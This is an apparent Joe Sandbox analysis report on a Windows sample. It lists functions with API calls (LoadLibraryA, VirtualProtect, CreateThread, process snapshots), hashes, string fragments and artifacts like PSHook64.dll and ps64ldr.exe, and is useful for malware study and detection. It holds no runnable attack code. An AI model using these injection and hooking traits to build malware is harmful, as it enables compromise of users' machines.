                                      • API ID: InfoLibraryLoadSystem
                                      • String ID: .$2$3$G$I$S$d$e$e$e$e$f$k$l$l$l$m$n$n$o$r$s$t$t$y
                                      • API String ID: 2528439753-3724200337
                                      • Opcode ID: d85b8bba056b28d2799e73070786ba9d67a4272c9851de9a1785cf0b177bbb99
                                      • Instruction ID: 593d3f6a05ceb624d47e8793ba80d147c9de408304e22044190e7317cd0caf72
                                      • Opcode Fuzzy Hash: d85b8bba056b28d2799e73070786ba9d67a4272c9851de9a1785cf0b177bbb99
                                      • Instruction Fuzzy Hash: EC21942040C7C0D9E3529628C08875FBEE26BA6748F88599DB1C95A292C7BF8658C767
                                      Function 005AE155 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 133threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 5ae155-5ae328 call 5abc65 * 3 CreateThread * 2 7 5ae336-5ae373 0->7 11 5ae379 7->11 12 5ae375-5ae377 7->12 13 5ae37e-5ae385 11->13 12->13
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • CreateThread.KERNELBASE(?,?,?,?,005AB6B9), ref: 005AE2E7
                                      • CreateThread.KERNELBASE ref: 005AE316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CreateThread$LibraryLoad
                                      • String ID: .$2$3$C$C$F$H$O$S$T$W$a$a$a$a$b$c$d$d$d$e$e$e$e$e$e$e$e$e$g$h$i$i$j$k$l$l$l$l$l$l$n$n$n$o$o$r$r$r$r$s$t$t$t
                                      • API String ID: 2788165007-893793269
                                      • Opcode ID: e91c4b7461437b13ac5e400fcfbaf4a77185ab935cdbb9ea016077ae64e05c00
                                      • Instruction ID: a9c2ae705baef2082f40e111d919b68f9ec4366bbd21f72320f8f3b8a1625fce
                                      • Opcode Fuzzy Hash: e91c4b7461437b13ac5e400fcfbaf4a77185ab935cdbb9ea016077ae64e05c00
                                      • Instruction Fuzzy Hash: DB61873010C7C4CEE366D728C45875FBFD2ABA2708F58495DA1D98A292CBFB8558C763
                                      Function 001F9E2D Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 132threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 14 1f9e2d-1f9ffc call 1f9afd * 3 CreateThread * 2 21 1fa00a-1fa047 14->21 25 1fa04d 21->25 26 1fa049-1fa04b 21->26 27 1fa052-1fa059 25->27 26->27
                                      APIs
                                        • Part of subcall function 001F9AFD: LoadLibraryA.KERNELBASE ref: 001F9B6A
                                      • CreateThread.KERNELBASE ref: 001F9FBB
                                      • CreateThread.KERNELBASE ref: 001F9FEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287901093.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1f0000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CreateThread$LibraryLoad
                                      • String ID: .$2$3$C$C$F$H$O$S$T$W$a$a$a$a$b$c$d$d$d$e$e$e$e$e$e$e$e$e$g$h$i$i$j$k$l$l$l$l$l$l$n$n$n$o$o$r$r$r$r$s$t$t$t
                                      • API String ID: 2788165007-893793269
                                      • Opcode ID: 8a5b82fe3d15e2b9049db49ce0ba258f13ec4bbdf6a4570f9736429d93e05b29
                                      • Instruction ID: 291817e796b9960acf98a799380addfb22d72d2452b00d03e3d2f6eea33324ca
                                      • Opcode Fuzzy Hash: 8a5b82fe3d15e2b9049db49ce0ba258f13ec4bbdf6a4570f9736429d93e05b29
                                      • Instruction Fuzzy Hash: 1461982010C7C4CEE366D728C44875FFFD26BA6708F48499DA1D98A292CBFB8558C763
                                      Function 005B3EA5 Relevance: 85.8, APIs: 2, Strings: 47, Instructions: 100memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • VirtualProtect.KERNELBASE ref: 005B3FFC
                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005B40E4), ref: 005B402B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$LibraryLoad
                                      • String ID: .$.$2$3$E$N$P$T$V$a$a$c$c$d$d$d$e$e$e$e$e$i$k$l$l$l$l$l$l$l$l$n$n$n$o$r$r$r$r$t$t$t$t$t$t$u$v
                                      • API String ID: 895956442-1938279493
                                      • Opcode ID: 29593c64c5ee00cf69436b8c0dd258b69dee577c9c3611ce782264d4661d657d
                                      • Instruction ID: b78614b32ac8907b9a09df1b16184db5f32317c8e75035ce3d5db1825498b7d3
                                      • Opcode Fuzzy Hash: 29593c64c5ee00cf69436b8c0dd258b69dee577c9c3611ce782264d4661d657d
                                      • Instruction Fuzzy Hash: 9051702040C7C0CAE312D728C45875FFFE26BA6748F48498CB1C54A2A6C7FB9598C767
                                      Function 005AC685 Relevance: 56.1, APIs: 1, Strings: 31, Instructions: 83COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 38 5ac685-5ac778 call 5abc65 * 2 SleepEx 44 5ac780-5ac7a3 38->44 45 5ac7ae 44->45 46 5ac7a5-5ac7aa 44->46 47 5ac7b0-5ac7b4 45->47 46->47
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AC768
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
                                      • API String ID: 2118945035-1678096204
                                      • Opcode ID: 0e9d0bfd401814517fb7312cad325cf59919dcbed0c5b293f02dbd59bae740da
                                      • Instruction ID: a972a2bbe0b627d0f12e1b288c88a0bad874826dfb65a3ba06c071d256f31a2c
                                      • Opcode Fuzzy Hash: 0e9d0bfd401814517fb7312cad325cf59919dcbed0c5b293f02dbd59bae740da
                                      • Instruction Fuzzy Hash: 1941802050C7C48AE742D768C448B5FFFD2ABA6748F48099DB1C98A392C7FAC558C767
                                      Function 005AD525 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 73COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 54 5ad525-5ad5b2 call 5abc65 57 5ad5be-5ad5c3 54->57 58 5ad5d3-5ad5fc 57->58 59 5ad5c5-5ad5d1 SleepEx 57->59 61 5ad5fe-5ad603 58->61 62 5ad607 58->62 60 5ad5b4-5ad5ba 59->60 60->57 63 5ad609-5ad60d 61->63 62->63
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AD5CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$2$3$S$d$e$e$e$e$k$l$l$l$l$n$p$r
                                      • API String ID: 2118945035-1151806120
                                      • Opcode ID: 4ef0a36a1f249cfd17cfa6607081ee08fb798763e5631dfdcc5d691ec55f17a4
                                      • Instruction ID: cea25475bbdc67bf88d6a05ce37f6f68c9194860cdc287ac09178876a074d0ae
                                      • Opcode Fuzzy Hash: 4ef0a36a1f249cfd17cfa6607081ee08fb798763e5631dfdcc5d691ec55f17a4
                                      • Instruction Fuzzy Hash: FA21E82050CBC48EE741E768844875FFFE2ABAA709F440A5DF0C996292D7FAC558C727
                                      Function 001F9AFD Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 64 1f9afd-1f9b5b call 1f9a3d call 1f98bd call 1f9a3d call 1f98bd 73 1f9b5d-1f9b63 64->73 74 1f9b95 64->74 73->74 75 1f9b65-1f9b79 LoadLibraryA 73->75 76 1f9b97-1f9b9b 74->76 77 1f9b81-1f9b8c 75->77 77->74 78 1f9b8e-1f9b93 77->78 78->76
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287901093.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1f0000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: bc3bdb819496df2ff72cb4def5e53009978536963dbe8734a7591a1aa869c889
                                      • Instruction ID: 044fc6e484cb4987e987d844ad1188199d26d1781f6c98eb2a78d23422867a38
                                      • Opcode Fuzzy Hash: bc3bdb819496df2ff72cb4def5e53009978536963dbe8734a7591a1aa869c889
                                      • Instruction Fuzzy Hash: 7E11C070528B4C9FD784FF28C048B2A7AE1FB98345F944A2DB58AD3260D775C585CB42
                                      Function 005ABC65 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 79 5abc65-5abcc3 call 5abba5 call 5aba25 call 5abba5 call 5aba25 88 5abcfd 79->88 89 5abcc5-5abccb 79->89 90 5abcff-5abd03 88->90 89->88 91 5abccd-5abce1 LoadLibraryA 89->91 92 5abce9-5abcf4 91->92 92->88 93 5abcf6-5abcfb 92->93 93->90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 235e72a7c4a46574d56536a75a93859d3b0f1fc4ed960766b8425097f384a9d1
                                      • Instruction ID: cd847659212ae07db4631e8abb889db73fe9e1e6fb89c0aacaf2138986361cff
                                      • Opcode Fuzzy Hash: 235e72a7c4a46574d56536a75a93859d3b0f1fc4ed960766b8425097f384a9d1
                                      • Instruction Fuzzy Hash: 8E11FE70528B499FE784EF28805C72E7EE1FBD8355F404A1DB489C22A1DB748984CB46
                                      Function 0000000140003A96 Relevance: 1.4, APIs: 1, Instructions: 113memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 94 140003a96-140003acb VirtualAlloc 95 140003ad7-140003af6 94->95 96 140003acd-140003b71 94->96 97 140003b05-140003b0f 95->97 101 140003b73-140003b93 96->101 102 140003b9b-140003ba2 96->102 99 140003b11-140003b36 97->99 100 140003b38-140003b4c 97->100 99->97 101->102 104 140003ba4-140003bc2 102->104 105 140003be6-140003bf0 102->105 114 140003bc4-140003bc9 104->114 115 140003bd0-140003bd8 104->115 107 140003bf2-140003bfd 105->107 108 140003bff-140003c09 105->108 107->108 110 140003c18-140003c27 107->110 111 140003c29-140003c39 108->111 112 140003c0b-140003c16 108->112 117 140003c49-140003c4c 110->117 111->117 112->110 112->111 114->115 115->105 118 140003bda-140003bdf 115->118 119 140003c5b-140003cd2 117->119 120 140003c4e-140003c57 117->120 118->105 120->119
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: f28f014416c05a534b485dd9bf541f64217d3e2b80d74e863d9e5ad7f47072ef
                                      • Instruction ID: 9fcde46676598f2d8985de621c429db9fda3c6d1cd9b1c5194609f7ba9f79def
                                      • Opcode Fuzzy Hash: f28f014416c05a534b485dd9bf541f64217d3e2b80d74e863d9e5ad7f47072ef
                                      • Instruction Fuzzy Hash: 75511776219B4482EB62DB0AF89479A73A4F38CBD8F154126EB8D477B4DB7DC4918700

                                      Non-executed Functions

                                      Function 005B2445 Relevance: 191.2, Strings: 152, Instructions: 1150COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 226 5b2445-5b2a4a call 5b4165 call 5af565 call 5b0aa5 call 5af615 * 2 call 5af565 call 5af615 call 5af2c5 call 5afa05 call 5af715 call 5af9b5 * 8 call 5abc65 call 5af615 call 5af565 * 6 call 5af485 call 5af615 * 5 call 5ac365 294 5b2a5f 226->294 295 5b2a4c-5b2a54 226->295 297 5b2a69-5b3053 call 5afa05 call 5b00e5 call 5b0205 call 5b0285 call 5b03b5 call 5afa05 call 5b00e5 call 5b0205 call 5b0285 call 5b1bf5 call 5b03b5 call 5afa05 call 5b00e5 call 5b0205 call 5b0285 call 5b1cc5 call 5b03b5 call 5afa05 call 5b00e5 call 5b0205 call 5b0285 call 5b1cc5 call 5b03b5 call 5b0925 * 4 call 5abc65 * 4 call 5b1135 294->297 295->294 296 5b2a56-5b2a5d call 5ac445 295->296 296->294 296->297 364 5b307b-5b31aa call 5af565 call 5af615 call 5af565 call 5af615 call 5af2c5 call 5afa05 call 5af7e5 call 5b03b5 297->364 365 5b3055-5b305d 297->365 385 5b36ca call 5ab525 364->385 386 5b31b0-5b31c2 364->386 365->364 366 5b305f-5b3074 365->366 366->364 388 5b36cf 385->388 386->385 391 5b31c8-5b33d2 call 5af565 call 5af615 call 5af2c5 call 5afa05 call 5b00e5 call 5b0205 call 5b0285 call 5abc65 386->391 390 5b36d0-5b3778 388->390 442 5b3779-5b3782 390->442 418 5b340d-5b34e9 call 5af485 call 5b05e5 * 4 391->418 419 5b33d4-5b3408 call 5acad5 391->419 446 5b34ef-5b34fa 418->446 447 5b359e-5b35a5 418->447 419->442 446->447 450 5b3500-5b3585 call 5b05e5 * 4 446->450 448 5b35ab-5b369c call 5b2145 call 5b05e5 * 8 447->448 449 5b369d-5b36c8 447->449 448->449 449->390 474 5b3589-5b3599 450->474 475 5b3587 450->475 474->446 475->447
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: -$-$.$.$.$.$.$.$.$.$/$/$/$2$2$3$3$:$A$A$A$F$F$F$G$G$G$H$H$H$HpS$P$P$P$S$S$S$V$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$g$g$h$h$i$i$i$j$j$j$j$j$j$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$n$o$o$o$p$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$x$x$y$y$y$z$z$z
                                      • API String ID: 1029625771-171351980
                                      • Opcode ID: cfdbf4389c9b1104a0e8a4b6bf7caf04d2c30c583f9a0fade0bd550eefe70e9a
                                      • Instruction ID: a80dd1e5b2907ff2429941fbb6b84f142a6324d89976aea9bb1587f8a70a4cfd
                                      • Opcode Fuzzy Hash: cfdbf4389c9b1104a0e8a4b6bf7caf04d2c30c583f9a0fade0bd550eefe70e9a
                                      • Instruction Fuzzy Hash: 29B2E53021C7C48AE776EB28C458BDFBBE1BBE5304F44492D90CE87295DAB5A944CB53
                                      Function 005AFA05 Relevance: 131.6, Strings: 105, Instructions: 351COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
                                      • API String ID: 1029625771-515521434
                                      • Opcode ID: 40b2e031f8b7b603e680d399ff321b66bd24f4a4aef26e730e424784db91921a
                                      • Instruction ID: 4b407891ff3a653c3c83d082effd25849786edc9a546ddce08b94d3bb3d5002a
                                      • Opcode Fuzzy Hash: 40b2e031f8b7b603e680d399ff321b66bd24f4a4aef26e730e424784db91921a
                                      • Instruction Fuzzy Hash: 7702B73010C7C4CEE772DB28C45879FBFD1ABA6709F04495DA1CD8A292CBBA5598C763
                                      Function 00000001400042D0 Relevance: 49.1, APIs: 24, Strings: 4, Instructions: 140memorylibraryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Find$FileHeap$AddressAppendPathProc$CloseFreeLibraryNextProcess$AllocDeleteFirstLoad
                                      • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW$version.dll
                                      • API String ID: 1301769236-8576242
                                      • Opcode ID: 602cf3a18254f789caf50c65d0e444867a13e0ed185ab1c788f2db204bae0101
                                      • Instruction ID: ea85576fe8112d40b92f550af8c0024e37ea0d9b7fc78088941ea10764493b20
                                      • Opcode Fuzzy Hash: 602cf3a18254f789caf50c65d0e444867a13e0ed185ab1c788f2db204bae0101
                                      • Instruction Fuzzy Hash: 65616171714A8586EF26CF22F8443D963A1F78CBD9F405121EB4A4BA79EFB9C649C700
                                      Function 00000001400043D0 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 108threadprocesssynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CloseHandle$Process$CreateFirstNextOpenProcess32SnapshotThread32Toolhelp32$CurrentMessageObjectPostSingleTerminateThreadWait
                                      • String ID: ps64ldr.exe
                                      • API String ID: 2684220759-1557747398
                                      • Opcode ID: 2067b6308fb2e066b3524b32a3b0dd7a672f7c8119cc6f74b7a7d0e2c0c7481d
                                      • Instruction ID: ce3777ac4d17e78d67ea8f15511cefb259924c50536e79486557088d44885b05
                                      • Opcode Fuzzy Hash: 2067b6308fb2e066b3524b32a3b0dd7a672f7c8119cc6f74b7a7d0e2c0c7481d
                                      • Instruction Fuzzy Hash: E44175B1600B4182EB2ADB17F8443D963A1F7CDBD1F544225EB1A076B6DF79C589C700
                                      Function 0000000140004580 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 82stringlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Process$CloseHandleNext$CharExitFirst$CreateFileOpenProcess32SnapshotThread32Toolhelp32$AppendCommandCurrentFindLibraryLineLoadMessageModuleNameObjectPathPostSingleTerminateThreadWaitlstrcmpilstrcpy
                                      • String ID: PSHook64.dll$SetHook$ps64start
                                      • API String ID: 332431168-2610298943
                                      • Opcode ID: 65c069a66cf27f93afbc93d153c66077ebfe7794891ddcc252e1ce5ddb40a19e
                                      • Instruction ID: 968b34224ca3ecc9b49ea74266e049d3f0c14ad38a8c9c0776c80c0bba26cdca
                                      • Opcode Fuzzy Hash: 65c069a66cf27f93afbc93d153c66077ebfe7794891ddcc252e1ce5ddb40a19e
                                      • Instruction Fuzzy Hash: 14313FB120464182EB2BDB63F8507E973A1EB9D7C4F444025FB0A476B6EF7AC548C705
                                      Function 0000000140004150 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 98memorylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Heap$AddressFindProc$FileFreeLibraryProcess$AllocAppendCloseFirstLoadNextPath
                                      • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW$version.dll
                                      • API String ID: 475380777-8576242
                                      • Opcode ID: d7f5f813a79bebc1c238e42f34f5596fc577a933a9e8701bf825a14ac297f4ef
                                      • Instruction ID: 4da8f5d26d1a9ea8b5913df79916ccdbe08d760e06f24acf903853bd57acbbd7
                                      • Opcode Fuzzy Hash: d7f5f813a79bebc1c238e42f34f5596fc577a933a9e8701bf825a14ac297f4ef
                                      • Instruction Fuzzy Hash: 3A417575714A8186EB62CF62F8443D963A0F78C7E8F444121EF4A476B9EF79C688C740
                                      Function 0000000140008218 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 4e319d0093985bc080cbc2daae4a5a4104123b95aa356b5be18928fd961074a8
                                      • Instruction ID: 78d5835676cf84a3f3559e45bea4fc867b78f14f8466544f311317fe0b1257a1
                                      • Opcode Fuzzy Hash: 4e319d0093985bc080cbc2daae4a5a4104123b95aa356b5be18928fd961074a8
                                      • Instruction Fuzzy Hash: B2314972204B8096EB65CB26E8403EE73A4F788798F540126EB9D47BA9EF38C5558B00
                                      Function 0000000140004094 Relevance: 7.6, APIs: 5, Instructions: 56fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: File$AppendFindFirstModuleNamePath
                                      • String ID:
                                      • API String ID: 2030518614-0
                                      • Opcode ID: dbe4185055809a95a0eac1771931ccaa00f21d04fdc49e02113e7dde96a34110
                                      • Instruction ID: 13494c8395834e9dc15df4e1537e68775d7893550f1ec515199dbd1a31cf0460
                                      • Opcode Fuzzy Hash: dbe4185055809a95a0eac1771931ccaa00f21d04fdc49e02113e7dde96a34110
                                      • Instruction Fuzzy Hash: D52190B2210A84A9EB33CF36EC047DA2760F7483EDF005221EB194B9F9DA75C289C744
                                      Function 000000014000A914 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                      Download Yara Rule
                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 000000014000A954
                                        • Part of subcall function 0000000140008444: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,0000000140008422), ref: 000000014000844D
                                        • Part of subcall function 0000000140008444: GetCurrentProcess.KERNEL32(?,?,?,?,0000000140008422), ref: 0000000140008471
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
